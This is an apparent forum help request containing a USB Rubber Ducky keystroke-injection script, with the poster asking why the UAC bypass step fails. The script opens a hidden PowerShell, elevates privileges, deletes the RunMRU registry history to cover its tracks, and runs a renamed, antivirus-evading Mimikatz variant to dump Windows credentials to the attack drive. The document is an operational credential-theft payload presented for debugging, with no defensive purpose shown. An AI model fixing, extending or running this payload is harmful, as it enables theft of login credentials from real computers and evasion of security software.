here is my code
DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y
DELAY 1000
LEFTARROW
DELAY 300
ENTER
DELAY 500
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
DELAY 300
ENTER
issue 1:
THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work
FILES is the name of rubber ducky
lb.ps1 is the customized mimi that does not get detected by AV etc
what am i doing wrong?